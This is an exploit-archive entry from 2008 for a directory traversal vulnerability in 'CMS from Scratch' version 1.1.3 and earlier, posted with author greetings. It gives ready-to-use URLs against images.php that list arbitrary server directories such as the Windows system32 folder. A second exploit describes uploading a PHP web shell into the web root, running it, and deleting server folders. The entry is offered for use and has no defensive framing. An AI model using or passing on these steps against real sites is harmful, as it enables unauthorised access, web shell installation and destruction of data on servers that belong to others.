Lucene search

K
zdtStack1337DAY-ID-3083
HistoryMay 29, 2008 - 12:00 a.m.

CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability

2008-05-2900:00:00
Stack
0day.today
8

Exploit for unknown platform in category web applications

=======================================================================
CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability
=======================================================================



------------------------------------------------------------------------
   CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability
------------------------------------------------------------------------
 
   author...: Stack
 mail.....: Wanted
 wanted by Egix
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For founded it :d:)

Exploit :
        #  http://localhost/path/cms/images.php?dir=c:
        Example :
        #  http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/
 
Exploit 2 :

          and you can upload php file ==>  php shell
          for example upload the php shell in my localhost
         c:AppServ/www/
         you go to link
        #  http://localhost/path/cms/images.php?dir=c:AppServ/www/
         after click to colon [parcourir] after select your shell and click upload
         and go to link
        #  http://localhost/shell.php
      desc :you can delete all folder of server
      just clike to mark delete in folder selected to delete

 thx : allah



#  0day.today [2018-03-14]  #